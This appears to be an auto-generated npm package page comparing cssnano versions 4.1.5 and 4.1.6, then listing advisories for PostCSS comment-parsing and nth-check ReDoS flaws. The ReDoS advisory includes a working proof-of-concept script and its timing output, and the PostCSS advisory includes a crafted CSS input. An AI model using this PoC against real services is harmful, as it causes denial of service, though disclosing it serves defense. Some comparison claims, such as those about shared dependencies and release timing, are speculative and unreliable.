Cssnano is a powerful, modular minifier built upon the PostCSS ecosystem, designed to optimize CSS code for production environments. Versions 4.1.5 and 4.1.6 share the same core functionality, dependencies, and development dependencies, both aiming to reduce CSS file sizes while maintaining visual consistency. Both versions depend on key packages like postcss for CSS parsing and transformation, cosmiconfig for configuration file handling, is-resolvable for module resolution, and cssnano-preset-default for a standard set of minification rules. Developers using either version benefit from a well-established ecosystem and a consistent API.
The primary difference between versions is the unpackedSize, an increase from 28029 to 28130. Although seemingly minor, this can reflect internal improvements, subtle bug fixes, or adjustments to dependencies. Developers should note the slight increase, potentially impacting build times depending on the scope of the project. The versions share dependencies like webpack and babel-loader, tools important for front-end developers, signifying their focus on modern build processes.
The new version was released 5 days later, which suggests that the changes introduced in the new version are not critical. The developer (Ben Briggs), license (MIT), and repository (GitHub) assures maintainability and open collaboration.
All the vulnerabilities related to the version 4.1.6 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms